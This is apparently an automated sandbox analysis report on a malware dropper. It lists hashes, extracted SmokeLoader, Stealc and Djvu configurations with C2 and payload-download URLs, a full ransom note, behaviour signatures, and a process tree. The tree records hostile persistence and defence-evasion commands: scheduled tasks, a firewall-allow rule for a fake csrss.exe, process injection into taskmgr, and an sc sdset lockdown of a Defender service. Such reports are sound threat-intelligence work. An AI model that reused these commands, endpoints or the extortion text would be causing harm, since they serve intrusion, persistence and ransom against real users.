Analysis

  • max time kernel
    125s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-02-2024 18:53

General

  • Target

    tmp.exe

  • Size

    7.1MB

  • MD5

    9a82e4f9ba1881fa411b6473d792f1a3

  • SHA1

    24c48768340c61376d3d5ef99091b456ad1f89fb

  • SHA256

    d823740cca44676c9fa128c25ca53cc16fbf8a1ad23c10d08f997e9e3fcd6655

  • SHA512

    a0819af9c420b188c9f326459ffd23f10d3d038dae0b48a98df34f1ad87d0d08323e184c3cda41ab794b8857f4a3f2c2f1b8c2f42dbc88f375ad87feccba17ec

  • SSDEEP

    98304:biPxK2EIDpN+bKXY/TMTRQOEThYBCvSx/Q1t1rakS9f4X/3mTiVRn:Sx3rQDTj9SCvl4F4uTiVRn

Malware Config

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

stealc

C2

http://185.172.128.79

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32
rc4.i32

Extracted

Family

djvu

C2

http://habrafa.com/test1/get.php

Attributes
  • extension

    .lkhy

  • offline_id

    OxV6DGl22io8sqMOW1zCCOlzPiv4f1Vqzw7Y8zt1

  • payload_url

    http://brusuax.com/dl/build2.exe

    http://habrafa.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://we.tl/t-uNdL2KHHdy Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0851ASdw

rsa_pubkey.plain

Signatures

  • DcRat 5 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Fabookie payload 2 IoCs
  • Detect ZGRat V1 3 IoCs
  • Detected Djvu ransomware 7 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Fabookie

    Fabookie is facebook account info stealer.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 10 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 17 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 64 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4124
    • C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe
      "C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:388
          • C:\Windows\SysWOW64\chcp.com
            chcp 1251
            5⤵
              PID:5096
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
              5⤵
              • DcRat
              • Creates scheduled task(s)
              PID:4812
        • C:\Users\Admin\AppData\Local\Temp\nsh58FF.tmp
          C:\Users\Admin\AppData\Local\Temp\nsh58FF.tmp
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:2916
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2916 -s 2036
            4⤵
            • Program crash
            PID:3580
      • C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
        "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:2808
      • C:\Users\Admin\AppData\Local\Temp\rty25.exe
        "C:\Users\Admin\AppData\Local\Temp\rty25.exe"
        2⤵
        • Executes dropped EXE
        PID:3084
      • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
        "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1660
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 372
          3⤵
          • Program crash
          PID:3108
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 388
          3⤵
          • Program crash
          PID:1764
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 392
          3⤵
          • Program crash
          PID:1936
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 668
          3⤵
          • Program crash
          PID:4480
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 680
          3⤵
          • Program crash
          PID:3440
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 680
          3⤵
          • Program crash
          PID:3088
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 680
          3⤵
          • Program crash
          PID:4648
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 748
          3⤵
          • Program crash
          PID:8
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 764
          3⤵
          • Program crash
          PID:3296
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 816
          3⤵
          • Program crash
          PID:3620
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 876
          3⤵
          • Program crash
          PID:436
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 860
          3⤵
          • Program crash
          PID:2360
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 716
          3⤵
          • Program crash
          PID:1448
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 796
          3⤵
          • Program crash
          PID:2016
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 760
          3⤵
          • Program crash
          PID:2280
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 692
          3⤵
          • Program crash
          PID:3500
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 876
          3⤵
          • Program crash
          PID:5016
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 764
          3⤵
          • Program crash
          PID:940
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 872
          3⤵
          • Program crash
          PID:548
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4268
        • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
          "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
          3⤵
          • DcRat
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:2208
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 340
            4⤵
            • Program crash
            PID:3788
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 364
            4⤵
            • Program crash
            PID:2808
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 380
            4⤵
            • Program crash
            PID:4796
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 408
            4⤵
            • Program crash
            PID:2360
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 696
            4⤵
            • Program crash
            PID:3576
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 696
            4⤵
            • Program crash
            PID:2016
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 696
            4⤵
            • Program crash
            PID:2280
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 716
            4⤵
            • Program crash
            PID:2828
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 748
            4⤵
            • Program crash
            PID:636
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Suspicious use of AdjustPrivilegeToken
            PID:2224
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4128
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              5⤵
              • Modifies Windows Firewall
              PID:1592
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:4648
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:2852
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 744
            4⤵
            • Program crash
            PID:4788
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Manipulates WinMonFS driver.
            • Drops file in Windows directory
            • Suspicious use of WriteProcessMemory
            PID:2268
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 372
              5⤵
              • Program crash
              PID:3708
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 388
              5⤵
              • Program crash
              PID:4156
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 404
              5⤵
              • Program crash
              PID:4140
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 620
              5⤵
              • Program crash
              PID:4100
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 724
              5⤵
              • Program crash
              PID:5060
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 724
              5⤵
              • Program crash
              PID:4664
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 748
              5⤵
              • Program crash
              PID:4960
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 756
              5⤵
              • Program crash
              PID:1948
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 776
              5⤵
              • Program crash
              PID:4476
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:1556
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              5⤵
              • DcRat
              • Creates scheduled task(s)
              PID:3764
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /delete /tn ScheduledUpdate /f
              5⤵
                PID:2360
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                PID:4228
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 796
                5⤵
                • Program crash
                PID:2548
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 936
                5⤵
                • Program crash
                PID:4692
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                PID:2492
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1004
                5⤵
                • Program crash
                PID:4476
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1020
                5⤵
                • Program crash
                PID:2708
              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                5⤵
                • Executes dropped EXE
                PID:1484
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • DcRat
                • Creates scheduled task(s)
                PID:388
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1000
                5⤵
                • Program crash
                PID:2312
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 980
                5⤵
                • Program crash
                PID:2116
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 964
                5⤵
                • Program crash
                PID:4736
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1092
                5⤵
                • Program crash
                PID:2372
              • C:\Windows\windefender.exe
                "C:\Windows\windefender.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:332
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2948
                  • C:\Windows\SysWOW64\sc.exe
                    sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    7⤵
                    • Launches sc.exe
                    PID:216
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1208
                5⤵
                • Program crash
                PID:2692
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1228
                5⤵
                • Program crash
                PID:3272
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 1220
                5⤵
                • Program crash
                PID:864
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1660 -ip 1660
        1⤵
          PID:1684
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1660 -ip 1660
          1⤵
            PID:1664
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1660 -ip 1660
            1⤵
              PID:3708
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1660 -ip 1660
              1⤵
                PID:1044
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1660 -ip 1660
                1⤵
                  PID:3124
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1660 -ip 1660
                  1⤵
                    PID:1152
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1660 -ip 1660
                    1⤵
                      PID:876
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1660 -ip 1660
                      1⤵
                        PID:2864
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1660 -ip 1660
                        1⤵
                          PID:3804
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1660 -ip 1660
                          1⤵
                            PID:3208
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1660 -ip 1660
                            1⤵
                              PID:1528
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1660 -ip 1660
                              1⤵
                                PID:1616
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1660 -ip 1660
                                1⤵
                                  PID:2492
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1660 -ip 1660
                                  1⤵
                                    PID:1316
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1660 -ip 1660
                                    1⤵
                                      PID:3644
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1660 -ip 1660
                                      1⤵
                                        PID:216
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1660 -ip 1660
                                        1⤵
                                          PID:2604
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1660 -ip 1660
                                          1⤵
                                            PID:3612
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1660 -ip 1660
                                            1⤵
                                              PID:828
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2208 -ip 2208
                                              1⤵
                                                PID:2152
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2208 -ip 2208
                                                1⤵
                                                  PID:3744
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2208 -ip 2208
                                                  1⤵
                                                    PID:1528
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2208 -ip 2208
                                                    1⤵
                                                      PID:1616
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2208 -ip 2208
                                                      1⤵
                                                        PID:3028
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2208 -ip 2208
                                                        1⤵
                                                          PID:2156
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2208 -ip 2208
                                                          1⤵
                                                            PID:4788
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2208 -ip 2208
                                                            1⤵
                                                              PID:4956
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2208 -ip 2208
                                                              1⤵
                                                                PID:2416
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2916 -ip 2916
                                                                1⤵
                                                                  PID:4432
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2208 -ip 2208
                                                                  1⤵
                                                                    PID:392
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2268 -ip 2268
                                                                    1⤵
                                                                      PID:4236
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2268 -ip 2268
                                                                      1⤵
                                                                        PID:1220
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2268 -ip 2268
                                                                        1⤵
                                                                          PID:4044
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2268 -ip 2268
                                                                          1⤵
                                                                            PID:544
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2268 -ip 2268
                                                                            1⤵
                                                                              PID:2084
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2268 -ip 2268
                                                                              1⤵
                                                                                PID:3200
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2268 -ip 2268
                                                                                1⤵
                                                                                  PID:4784
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2268 -ip 2268
                                                                                  1⤵
                                                                                    PID:2864
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2268 -ip 2268
                                                                                    1⤵
                                                                                      PID:5064
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2268 -ip 2268
                                                                                      1⤵
                                                                                        PID:3476
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2268 -ip 2268
                                                                                        1⤵
                                                                                          PID:3316
                                                                                        • C:\Users\Admin\AppData\Local\Temp\C813.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\C813.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:60
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2268 -ip 2268
                                                                                          1⤵
                                                                                            PID:3628
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2268 -ip 2268
                                                                                            1⤵
                                                                                              PID:4848
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2268 -ip 2268
                                                                                              1⤵
                                                                                                PID:1644
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2268 -ip 2268
                                                                                                1⤵
                                                                                                  PID:4652
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2268 -ip 2268
                                                                                                  1⤵
                                                                                                    PID:3576
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2268 -ip 2268
                                                                                                    1⤵
                                                                                                      PID:1448
                                                                                                    • C:\Windows\windefender.exe
                                                                                                      C:\Windows\windefender.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4868
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\48AD.exe
